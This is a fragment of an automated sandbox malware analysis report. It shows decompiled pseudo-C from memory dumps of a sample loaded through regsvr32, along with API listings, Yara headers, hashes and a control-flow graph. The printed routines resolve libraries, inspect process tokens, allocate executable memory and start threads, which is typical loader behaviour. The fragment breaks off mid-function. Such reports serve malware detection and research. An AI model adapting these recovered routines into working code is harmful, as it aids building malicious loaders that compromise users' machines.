                                                                                                                                                                                              						 *0x42bf828 = E042AF05C(0x42bcbb8, _t48);
                                                                                                                                                                                              						E042A6370(_t48, __eflags);
                                                                                                                                                                                              						E042A8BF4( &_a8, 0xfffffffe);
                                                                                                                                                                                              						_t36 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					_t31 = CreateThread(0, 0, E042A6298, 0, 0,  &_v8);
                                                                                                                                                                                              					 *0x42bf83c = _t31;
                                                                                                                                                                                              					__eflags = _t31;
                                                                                                                                                                                              					if(_t31 == 0) {
                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E042A8BAF();
                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                              			}













                                                                                                                                                                                              0x042a655f
                                                                                                                                                                                              0x042a656e
                                                                                                                                                                                              0x042a6573
                                                                                                                                                                                              0x042a6576
                                                                                                                                                                                              0x042a6578
                                                                                                                                                                                              0x042a6581
                                                                                                                                                                                              0x042a658c
                                                                                                                                                                                              0x042a6591
                                                                                                                                                                                              0x042a659c
                                                                                                                                                                                              0x042a65a1
                                                                                                                                                                                              0x042a65ab
                                                                                                                                                                                              0x042a65ab
                                                                                                                                                                                              0x042a65c5
                                                                                                                                                                                              0x042a65c8
                                                                                                                                                                                              0x042a65cb
                                                                                                                                                                                              0x042a65d0
                                                                                                                                                                                              0x042a65d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a65d2
                                                                                                                                                                                              0x042a6550
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,042A6502), ref: 042A8BD2
                                                                                                                                                                                                • Part of subcall function 042AF05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,042BCA50,?,042A652B,?), ref: 042AF07E
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 042A6541
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,042A6298,00000000,00000000,?), ref: 042A65C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 607385197-0
                                                                                                                                                                                              • Opcode ID: 889e4f299648ebc242b5c062c6859663f0534a75eb05743adaccfff3b284a9aa
                                                                                                                                                                                              • Instruction ID: f232d8d60250563ccbf50d1e7ae658992853579e35e43eac28d656ebe05a0e23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 889e4f299648ebc242b5c062c6859663f0534a75eb05743adaccfff3b284a9aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21A6B0720205EBEB04FF78E909A9D37D8DF04354F05C529EA99CA180DF78E590CBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 420 82f9d0-82fa1b call 82fdc0 423 82fa2a-82fa5a call 82f7a0 VirtualAlloc 420->423 424 82fa1d-82fa27 call 82fdc0 420->424 424->423
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0082FA54
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_810000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID: VirtualAlloc
                                                                                                                                                                                              • API String ID: 4275171209-164498762
                                                                                                                                                                                              • Opcode ID: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction ID: d2b75c6d54729c2b8e80c4b03de1904733b4b79b4340669d571eb8d62b993c8b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C114260D082C9DEEF01D7E89409BEFBFB55F11708F0440A8DA446B282D2BA5758C7B6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E042AF05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _t5;
                                                                                                                                                                                              				struct HINSTANCE__* _t7;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                              				_t22 = __edx;
                                                                                                                                                                                              				_t5 = E042A9DD8(_a4);
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v8 = _t5;
                                                                                                                                                                                              				_push(_t5);
                                                                                                                                                                                              				if(_a4 != 0xf43) {
                                                                                                                                                                                              					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t7 = GetModuleHandleA();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                                              					_t10 = E042AF011(_t12, _t22, _t7); // executed
                                                                                                                                                                                              					_t25 = _t10;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E042A8B9C( &_v8);
                                                                                                                                                                                              				return _t25;
                                                                                                                                                                                              			}











                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,042BCA50,?,042A652B,?), ref: 042AF07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,042BCA50,?,042A652B,?), ref: 042AF08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: ba385203876a1a7c0d6c1b0f937a0720a44826135bc4cb21b602b8806766a62d
                                                                                                                                                                                              • Instruction ID: 85daca316b450ff8bf848031d29b034d26fe34a37d512065a0be4f4d49401f51
                                                                                                                                                                                              • Opcode Fuzzy Hash: ba385203876a1a7c0d6c1b0f937a0720a44826135bc4cb21b602b8806766a62d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33F0A771310214ABD714ABADF98489AB3ECDF48354711443AFE06D7150EAB4AE8086E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E042AC8C9(void* __ecx, void* __esi) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				short _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                              				char _t37;
                                                                                                                                                                                              				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                                              				char _t45;
                                                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t37 = 0;
                                                                                                                                                                                              				_v28 = 0x500;
                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_t20 = E042AC79E(__ecx);
                                                                                                                                                                                              				_v16 = _t20;
                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                              					_push( &_v24);
                                                                                                                                                                                              					_t44 = 2;
                                                                                                                                                                                              					_t21 = E042AC7F5(_t44); // executed
                                                                                                                                                                                              					_t48 = _t21;
                                                                                                                                                                                              					_v20 = _t48;
                                                                                                                                                                                              					if(_t48 == 0) {
                                                                                                                                                                                              						L10:
                                                                                                                                                                                              						FindCloseChangeNotification(_v16);
                                                                                                                                                                                              						if(_t48 != 0) {
                                                                                                                                                                                              							E042A8BF4( &_v20, _t37);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return _t45;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push( &_v12);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0x220);
                                                                                                                                                                                              					_push(0x20);
                                                                                                                                                                                              					_push(2);
                                                                                                                                                                                              					_push( &_v32);
                                                                                                                                                                                              					_t29 =  *0x42bf820; // 0x48efaa0
                                                                                                                                                                                              					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if( *_t48 <= 0) {
                                                                                                                                                                                              						L9:
                                                                                                                                                                                              						_t31 =  *0x42bf820; // 0x48efaa0
                                                                                                                                                                                              						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                                              					_t33 = _t9;
                                                                                                                                                                                              					_v8 = _t33;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_push(_v12);
                                                                                                                                                                                              						_push( *_t33);
                                                                                                                                                                                              						_t34 =  *0x42bf820; // 0x48efaa0
                                                                                                                                                                                              						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t37 = _t37 + 1;
                                                                                                                                                                                              						_t33 = _v8 + 8;
                                                                                                                                                                                              						_v8 = _t33;
                                                                                                                                                                                              						if(_t37 <  *_t48) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t45 = 1;
                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t20;
                                                                                                                                                                                              			}





















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042AC79E: GetCurrentThread.KERNEL32 ref: 042AC7B1
                                                                                                                                                                                                • Part of subcall function 042AC79E: OpenThreadToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7B8
                                                                                                                                                                                                • Part of subcall function 042AC79E: GetLastError.KERNEL32(?,?,042AC8E3,00000000,042A0000), ref: 042AC7BF
                                                                                                                                                                                                • Part of subcall function 042AC79E: OpenProcessToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7E4
                                                                                                                                                                                                • Part of subcall function 042AC7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,042A0000,00000000,00000000,?,042AC876,00000000,00000000,?,042AC89F), ref: 042AC810
                                                                                                                                                                                                • Part of subcall function 042AC7F5: GetLastError.KERNEL32(?,042AC876,00000000,00000000,?,042AC89F,00001644,?,042ADFCE), ref: 042AC817
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,042A0000), ref: 042AC96D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1806447117-0
                                                                                                                                                                                              • Opcode ID: a7a01199a755cf2343f21750f592ba3baa4ff58b3903e668fc09531809b609ed
                                                                                                                                                                                              • Instruction ID: 79f02a75d7f0bbe7aab7fd768d4675def187e6f5f39ad9430f23bccefad89b80
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7a01199a755cf2343f21750f592ba3baa4ff58b3903e668fc09531809b609ed
                                                                                                                                                                                              • Instruction Fuzzy Hash: AF217F32B1020AAFDB10EFAADC85AAEB7F8FF08700F114469E941E7150D730AE148B94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A6298(void* __fp0) {
                                                                                                                                                                                              				void* __ecx;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                              				intOrPtr _t17;
                                                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t32 = __fp0;
                                                                                                                                                                                              				E042A6412();
                                                                                                                                                                                              				GetOEMCP();
                                                                                                                                                                                              				_t13 = E042ADF3D(__fp0); // executed
                                                                                                                                                                                              				 *0x42bf81c = _t13;
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
                                                                                                                                                                                              					_t14 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              					_t2 = _t14 + 0x224; // 0x42a0000
                                                                                                                                                                                              					E042B3BD5( *_t2);
                                                                                                                                                                                              					_t26 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              					_t25 = _t27;
                                                                                                                                                                                              					__eflags =  *(_t26 + 0x1898) & 0x00010000;
                                                                                                                                                                                              					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
                                                                                                                                                                                              						_t7 = _t26 + 0x224; // 0x42a0000, executed
                                                                                                                                                                                              						_t26 =  *_t7;
                                                                                                                                                                                              						_t16 = E042AD804( *_t7); // executed
                                                                                                                                                                                              						__eflags = _t16;
                                                                                                                                                                                              						_t17 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
                                                                                                                                                                                              							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
                                                                                                                                                                                              								L10:
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              								return 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L9:
                                                                                                                                                                                              							E042A35A1();
                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						_t20 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E042A611B(_t25, _t26, __eflags, _t32);
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t13 + 1;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetOEMCP.KERNEL32 ref: 042A629D
                                                                                                                                                                                                • Part of subcall function 042ADF3D: GetCurrentProcessId.KERNEL32 ref: 042ADF64
                                                                                                                                                                                                • Part of subcall function 042ADF3D: GetLastError.KERNEL32 ref: 042AE05E
                                                                                                                                                                                                • Part of subcall function 042ADF3D: GetSystemMetrics.USER32(00001000), ref: 042AE06E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentErrorLastMetricsProcessSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1196160345-0
                                                                                                                                                                                              • Opcode ID: 47a9523e393e69138952ffc1ae5d40fd9602cc6906de25e0c07141534fcad42c
                                                                                                                                                                                              • Instruction ID: e92bb5a93e14fb679eeb3bb082a79c3f5e7df856ea4e03354a60d14445bc3048
                                                                                                                                                                                              • Opcode Fuzzy Hash: 47a9523e393e69138952ffc1ae5d40fd9602cc6906de25e0c07141534fcad42c
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA015E717342028FD314EF68A948AE5B7E0EB0A714F0942B5E884CA111C77469A7CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AC879(void* __ecx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t12 =  *0x42bf820; // 0x48efaa0
                                                                                                                                                                                              				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					_t14 = E042AC862(); // executed
                                                                                                                                                                                              					_t23 = _t14;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						FindCloseChangeNotification(_v8);
                                                                                                                                                                                              						_t17 = _t23;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_v8 != _t14) {
                                                                                                                                                                                              							_t18 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t17 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return _t13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}











                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e9fb4e8a3b556cdcdbbb1ebdee866d3d5994cd00579fc49bc47f34336bb4222d
                                                                                                                                                                                              • Instruction ID: 526492b1e7faa48f45102054494e2116a2e797a07cb0daf8cb83426ef673ac28
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9fb4e8a3b556cdcdbbb1ebdee866d3d5994cd00579fc49bc47f34336bb4222d
                                                                                                                                                                                              • Instruction Fuzzy Hash: C6F03A32B20105EFEB12DBAAE909A9D73F8FF08745F0141A4E941E7150DB34EE10DB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A632E() {
                                                                                                                                                                                              				intOrPtr _t3;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t3 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              				 *((intOrPtr*)(_t3 + 0x2c))( *0x42bf83c, 0xffffffff);
                                                                                                                                                                                              				ExitProcess(0);
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x042a632e
                                                                                                                                                                                              0x042a633b
                                                                                                                                                                                              0x042a6345

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 042A6345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                              • Opcode ID: 9fbe48543bbb328739cab186c3177009cc84be252897381a42ad5f25a26f5d0b
                                                                                                                                                                                              • Instruction ID: 2e386bc4b95b043163e818dbf05bab01b7bc036f77b71db25d8173c43495dbb8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fbe48543bbb328739cab186c3177009cc84be252897381a42ad5f25a26f5d0b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AC002713140109FC7409B68FE4DF4437E0EB0D322F12C7A0F569DA1E5CB3499819B80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A8BDE(long _a4) {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t2 = RtlAllocateHeap( *0x42bf900, 8, _a4); // executed
                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x042a8bec
                                                                                                                                                                                              0x042a8bf3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: 18da0c6038c4ac6a82bea823b0c7988bd1949d35eedcb9de10724db368a52ca8
                                                                                                                                                                                              • Instruction ID: 7488b7ded20e4bbe346130b2ffa5542001697988298f99de360a1314890182bd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 18da0c6038c4ac6a82bea823b0c7988bd1949d35eedcb9de10724db368a52ca8
                                                                                                                                                                                              • Instruction Fuzzy Hash: CCB09231280A0CBBDB011AADFC09A843F29F715755F004010F70C44460CB6668609BC4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E042ADA57(void* __ecx) {
                                                                                                                                                                                              				signed int _t4;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t4 = ResumeThread( *(__ecx + 4));
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				return  ~_t4 & 0x00000001;
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x042ada5f
                                                                                                                                                                                              0x042ada67
                                                                                                                                                                                              0x042ada6c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResumeThread.KERNELBASE(?,042AD8C2,?,?,00000001), ref: 042ADA5F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 0c9e770384bf7c531b23f4d461c8b89c94021fb87f062217cc748360d7251566
                                                                                                                                                                                              • Instruction ID: e7bf7cdada17802bc3449363e2c268e591e7f9d64329db5a45298186a66f5274
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c9e770384bf7c531b23f4d461c8b89c94021fb87f062217cc748360d7251566
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8B092323A00019BCB004B78FD0B9903BE0FB5A706799C2F0A045C6061C32EC8868A80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042A8BC9() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                                              				 *0x42bf900 = _t1;
                                                                                                                                                                                              				return _t1;
                                                                                                                                                                                              			}




                                                                                                                                                                                              0x042a8bd2
                                                                                                                                                                                              0x042a8bd8
                                                                                                                                                                                              0x042a8bdd

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,042A6502), ref: 042A8BD2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              • Opcode ID: 87011f47f769d9483916ac878f5a3097de268c5c8c173a9b90e104cc08f905ad
                                                                                                                                                                                              • Instruction ID: 2eb4a29fcc862135e97c3a74320027e2604efa91569812e38fc6c4b6d1b7c780
                                                                                                                                                                                              • Opcode Fuzzy Hash: 87011f47f769d9483916ac878f5a3097de268c5c8c173a9b90e104cc08f905ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BB012B038570066E6100B287C4EB003510E380B02F100000F705D81C0D7A434409548
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E042ADA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				signed int* _t36;
                                                                                                                                                                                              				signed int* _t39;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t36 = _a8;
                                                                                                                                                                                              				_t28 = _t36[1];
                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                              					_t39 = _t36[2];
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_a8 = _a8 & 0x00000000;
                                                                                                                                                                                              						if(_t39[2] > 0) {
                                                                                                                                                                                              							_t31 = _t39[3];
                                                                                                                                                                                              							_t22 = _a4 + 0x24;
                                                                                                                                                                                              							_v12 = _a4 + 0x24;
